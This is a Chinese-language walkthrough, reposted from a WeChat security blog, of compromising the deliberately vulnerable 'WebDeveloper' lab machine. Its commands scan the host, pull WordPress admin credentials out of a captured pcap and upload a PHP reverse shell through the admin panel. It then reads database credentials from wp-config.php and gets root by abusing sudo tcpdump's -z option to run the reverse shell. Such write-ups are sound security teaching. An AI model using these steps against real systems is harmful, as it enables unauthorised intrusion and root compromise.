WebDeveloper靶机详解

admin 2025年6月7日01:33:13评论1 views字数 1432阅读4分46秒阅读模式

一、主机发现

arp-scan -l
WebDeveloper靶机详解

靶机ip为192.168.55.163

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.163
WebDeveloper靶机详解

发现并无特殊端口开放

扫描一下UDP端口

nmap -sU --min-rate 10000 -p- 192.168.55.163

没有扫描到UDP端口

2.2目录枚举

dirb http://192.168.55.163
WebDeveloper靶机详解

2.3漏洞扫描

nmap --script=vuln -p22,80 192.168.55.163
WebDeveloper靶机详解

2.4指纹识别

nmap 192.168.55.163 -sV -sC -O --version-all
WebDeveloper靶机详解

三、进入靶机网页进行信息收集,反弹shell

访问靶机页面,经典的wordpress页面

WebDeveloper靶机详解

根据刚刚的目录枚举,找到了一个登录框

WebDeveloper靶机详解

又发现了一个目录下有文件可以下载

WebDeveloper靶机详解

下载后使用wireshark打开

WebDeveloper靶机详解

尝试在此数据包中找到管理员登陆的账号和密码

在其中进行过滤:http.request.method=="POST"

WebDeveloper靶机详解

成功找到wordpress的账号和密码

webdeveloper
Te5eQg&4sBS!Yr$)wf%(DcAd
WebDeveloper靶机详解

成功进入后台

发现可以进行文件上传

WebDeveloper靶机详解

将kali自带的反弹shell脚本进行上传

找到刚刚目录枚举出的结果,发现上传的文件目录在http://192.168.55.163/wp-content/uploads/下,进去找到上传的文件,先在kali中监听,然后访问该文件即可成功反弹shell

WebDeveloper靶机详解

四、tcpdump提权

将shell升级为交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

4.1靶机内信息收集

WebDeveloper靶机详解

寻找sudo命令,发现不能执行sudo命令

寻找suid命令

find / -perm  -4000 -print 2>/dev/null
WebDeveloper靶机详解

这些命令也都用不了

查找定时任务,发现没有定时任务

接着去靶机的目录下找相关信息

4.2登陆webdeveloper用户

进入/var/www/html目录下,发现wp-config.php文件可以查看

WebDeveloper靶机详解

找到了数据库中的账号密码

webdeveloper
MasterOfTheUniverse

使用ssh登陆该用户

ssh [email protected] 
WebDeveloper靶机详解

4.3tcpdump提权

发现该用户可以使用tcpdump命令

WebDeveloper靶机详解

那直接去网站上找相关命令提权即可

WebDeveloper靶机详解
cd /tmp
command='php /var/www/html/wp-content/uploads/2025/03/php-reverse-shell.php'
echo"$command" > /tmp/shell
chmod 777 shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell -Z root
注:
最后一条命令稍微修改了一下
网络接口 (`-i`参数):网站上的命令使用的是`lo`(本地回环)网络接口进行数据包捕获,而修改的命令(sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root)使用的是`eth0`网络接口进行数据包捕获。`eth0`一般是指物理网卡接口,而`lo`是指本地回环接口,用于本地通信,所以需要进行修改一下再使用
WebDeveloper靶机详解

成功提权!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):WebDeveloper靶机详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日01:33:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WebDeveloper靶机详解http://cn-sec.com/archives/3868338.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息